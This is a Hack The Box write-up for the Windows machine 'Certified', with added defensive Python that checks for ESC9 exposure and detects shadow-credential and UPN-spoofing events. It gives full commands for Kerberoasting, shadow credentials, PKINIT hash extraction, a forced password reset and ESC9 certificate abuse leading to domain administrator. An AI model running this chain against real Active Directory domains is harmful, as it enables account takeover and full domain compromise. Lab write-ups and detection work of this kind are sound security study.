Certified
March 15, 2025
Created by: ruycr4ft
Page: Hack The Box
Difficulty: Medium
OS: Windows

I start with a scan of all the ports and continue with a scan of the versions and technologies running on the open ports I have found:

nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.41 -oG scan

nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49668,49673,49674,49683,49713,49737,49770 -sCV -Pn 10.10.11.41 -oN ports

I have access via SMB to the IPC$ share and thanks to that I am able to enumerate the system:

netexec smb 10.10.11.41 -u judith.mader -p judith09 --shares

netexec ldap 10.10.11.41 -u judith.mader -p judith09 --bloodhound --collection All --dns-server 10.10.11.41

Before analyzing with BloodHound, since I have valid credentials I check which users I can request a TGS for.

rdate -n 10.10.11.41; impacket-GetUserSPNs certified.htb/judith.mader:judith09 -request

I can request one for the management_svc user and sometimes I can crack it and get its password. After completing the whole machine I understand why the TGS can sometimes be cracked and sometimes not. As this is not the intended way to complete the machine, I am not going to follow up on this point.

Analyzing with BloodHound I see that I have "WriteOwner" permission on the management group, and that group in turn has "GenericWrite" permission on the management_svc user. Thanks to the first one I can change the owner of the object, and with the second one I can change the user's password without knowing the current one.

I start by changing the owner of the management group to judith.mader with owneredit from impacket:

owneredit.py -action write -new-owner 'judith.mader' -target-dn 'CN=management,CN=Users,DC=certified,DC=htb' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.10.11.41

With this I get the user's ticket, but I am not able to get his password in clear text.
rdate -n 10.10.11.41; ./targetedKerberoast.py --dc-ip '10.10.11.41' -v -d 'certified.htb' -u 'judith.mader' -p 'judith09'

Observing that judith has "Owns" and "WriteOwner" permissions on the management group, and that this group has "GenericWrite" permission on the management_svc user, we can first become a member of the group and then get the user's hash. This relies on Kerberos PKINIT.

pywhisker.py -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add" --filename test1

# Request a Ticket-Granting-Ticket (TGT) for the management_svc user with the certificate just added
./gettgtpkinit.py -cert-pfx test1.pfx -pfx-pass 4l99njREI8ehV7aLoA7a certified.htb/Management_svc Management_svc.ccache

# Set the KRB5CCNAME environment variable so the tools use that ticket
export KRB5CCNAME=Management_svc.ccache

# Using getnthash.py from PKINITtools we can request the NT hash of the target user: it uses Kerberos U2U to submit a TGS request whose Privileged Attribute Certificate (PAC) contains the NT hash of the target, and the PAC can be decrypted with the AS-REP encryption key obtained when requesting the TGT earlier.
rdate -n 10.10.11.41; ./getnthash.py -key d85b3ba5fcb9c40d666dd6c4d7413c9273276f039ea2342d32dff2723ad291a1 certified.htb/Management_svc

Already having the hash of the management_svc user, I connect over WinRM and manage to read the first flag.

evil-winrm -i 10.10.11.41 -u Management_svc -H a091XXXXXXXXXXXXXXXXXX584

Having the credentials of this user, we can move laterally to the ca_operator user by changing its password. Having "GenericAll" permission on the user ca_operator, I can set the user's password without knowing the current one.
pth-net rpc password "ca_operator" "newP@ssword2022" -U certified.htb/management_svc%"a091c1832bcdd4677c28b5a6a1295584":"a091c1832bcdd4677c28b5a6a1295584" -S dc01.certified.htb

crackmapexec smb 10.10.11.41 -u 'ca_operator' -p 'newP@ssword2022'

With these credentials we enumerate the system in order to add the certificate part to BloodHound.

rdate -n 10.10.11.41; certipy-ad req -u ca_operator@certified.htb -p newP@ssword2022 -dc-ip 10.10.11.41 -ca certified-DC01-CA -target certified.htb -template User

crackpkcs12 -d /usr/share/wordlists/rockyou.txt ca_operator.pfx -t 25

# Download the fork version of BloodHound
rdate -n 10.10.11.41; certipy-ad find -u ca_operator@certified.htb -p newP@ssword2022 -dc-ip 10.10.11.41 -old-bloodhound

With the certipy tool I search for any vulnerability in the certificate templates. It tells me that it may be vulnerable to ESC9. With the "find" option you can list AD CS certificate templates, certificate authorities and other settings:

certipy-ad find -u ca_operator -p 'newP@ssword2022' -dc-ip 10.10.11.41 -stdout -enabled -vulnerable

To exploit this vulnerability I get help from this page, which tells me the steps to execute.
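As an added example (not part of the writeup), the check below encodes the preconditions certipy reports as ESC9 from the defender's side: a template that omits the SID security extension, issues client-authentication certificates without manager approval, while the DCs are not in full StrongCertificateBindingEnforcement mode. The template names come from the writeup; their attribute values are constructed for illustration.

```python
# Added example, not the writeup's or certipy's code: evaluate whether a
# template/DC configuration still leaves the ESC9 path open and list the
# settings that close it. Template attribute values are CONSTRUCTED.
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000  # msPKI-Enrollment-Flag: omit szOID_NTDS_CA_SECURITY_EXT
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002      # msPKI-Enrollment-Flag: CA manager approval required
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "2.5.29.37.0",              # Any Purpose
}

def assess_esc9(template: dict, strong_binding_enforcement: int) -> dict:
    r"""strong_binding_enforcement is the DC registry value
    HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement
    (0 = disabled, 1 = compatibility mode, 2 = full enforcement)."""
    flags = template["enrollment_flag"]
    no_sec_ext = bool(flags & CT_FLAG_NO_SECURITY_EXTENSION)
    manager_approval = bool(flags & CT_FLAG_PEND_ALL_REQUESTS)
    # An empty EKU list means the certificate is valid for any purpose.
    client_auth = not template["ekus"] or bool(set(template["ekus"]) & CLIENT_AUTH_EKUS)
    # Full enforcement rejects certificates without the SID extension, so a
    # UPN-only mapping cannot be abused even if the template still omits it.
    exposed = (no_sec_ext and client_auth and not manager_approval
               and strong_binding_enforcement != 2)
    fixes = []
    if exposed:
        fixes.append("clear CT_FLAG_NO_SECURITY_EXTENSION (0x80000) in msPKI-Enrollment-Flag")
        fixes.append("set StrongCertificateBindingEnforcement=2 on every DC")
        fixes.append("or require CA manager approval (CT_FLAG_PEND_ALL_REQUESTS) on the template")
    return {"exposed": exposed, "fixes": fixes}

# Constructed sample: a template carrying the flag and a stock-like User template.
TEMPLATES = {
    "CertifiedAuthentication": {"enrollment_flag": CT_FLAG_NO_SECURITY_EXTENSION | 0x20,
                                "ekus": ["1.3.6.1.5.5.7.3.2"]},
    "User": {"enrollment_flag": 0x29, "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"]},
}

if __name__ == "__main__":
    for name, tpl in TEMPLATES.items():
        print(name, assess_esc9(tpl, strong_binding_enforcement=1))
```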
rdate -n 10.10.11.41; certipy-ad shadow auto -username "management_svc@certified.htb" -hashes "a091c1832bcdd4677c28b5a6a1295584" -account ca_operator

certipy-ad account update -username "management_svc@certified.htb" -hashes "a091c1832bcdd4677c28b5a6a1295584" -user ca_operator -upn administrator

certipy-ad req -username "ca_operator@certified.htb" -hashes "01794af19fd00af4f2528923c4ef08be" -target "certified.htb" -ca 'certified-DC01-CA' -template 'CertifiedAuthentication'

certipy-ad account update -username "management_svc@certified.htb" -hashes "a091c1832bcdd4677c28b5a6a1295584" -user ca_operator -upn "ca_operator@certified.htb"

rdate -n 10.10.11.41; certipy-ad auth -pfx ca_operator.pfx -domain certified.htb

After validating and confirming that the NTLM hash is correct for the administrator user, I connect to the system and get to read the second flag.

evil-winrm -i 10.10.11.41 -u administrator -H "0d5bXXXXXXXXXXXXXXXXXX2d34"
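The two account manipulations this chain depends on, the shadow-credential write to msDS-KeyCredentialLink (pywhisker / certipy shadow) and the UPN being set to administrator and then reverted, each leave a record in a DC's Security log. As an added example that is not part of the writeup, the detection logic below runs over constructed event records shaped like exported 5136 (directory object modified) and 4738 (user account changed) events and flags both patterns; the field names and timestamps are assumptions.

```python
from datetime import datetime, timedelta

# CONSTRUCTED event records (not real logs from the box), as a SIEM would
# export them from a DC with directory-object and account-management auditing.
EVENTS = [
    {"id": 5136, "time": "2025-03-15T10:01:00", "actor": "judith.mader",
     "target": "management_svc", "attribute": "msDS-KeyCredentialLink"},
    {"id": 4738, "time": "2025-03-15T10:20:00", "actor": "management_svc",
     "target": "ca_operator", "new_upn": "administrator"},
    {"id": 4738, "time": "2025-03-15T10:22:00", "actor": "management_svc",
     "target": "ca_operator", "new_upn": "ca_operator@certified.htb"},
    {"id": 4738, "time": "2025-03-15T11:00:00", "actor": "helpdesk",
     "target": "j.doe", "new_upn": "j.doe@certified.htb"},   # benign change
]

PRIVILEGED = {"administrator"}        # names whose UPN no other account may take
REVERT_WINDOW = timedelta(minutes=30)  # UPN changed twice within this => suspicious

def ts(event):
    return datetime.fromisoformat(event["time"])

def detect(events):
    alerts = []
    last_upn_change = {}  # target account -> time of its previous UPN change
    for e in sorted(events, key=ts):
        if (e["id"] == 5136 and e.get("attribute") == "msDS-KeyCredentialLink"
                and e["actor"] != e["target"]):
            # Key credentials are normally written by the account itself (or by
            # the DC during Windows Hello provisioning), not by another user.
            alerts.append(f"shadow-credentials: {e['actor']} wrote "
                          f"msDS-KeyCredentialLink on {e['target']}")
        if e["id"] == 4738 and e.get("new_upn"):
            local_part = e["new_upn"].split("@")[0].lower()
            if local_part in PRIVILEGED and local_part != e["target"].lower():
                # UPN now resolves to a different, privileged account (ESC9 pattern).
                alerts.append(f"upn-spoof: {e['actor']} set UPN of "
                              f"{e['target']} to {e['new_upn']}")
            prev = last_upn_change.get(e["target"])
            if prev is not None and ts(e) - prev <= REVERT_WINDOW:
                alerts.append(f"upn-flip: UPN of {e['target']} changed twice "
                              f"within {REVERT_WINDOW}")
            last_upn_change[e["target"]] = ts(e)
    return alerts

if __name__ == "__main__":
    for line in detect(EVENTS):
        print(line)
```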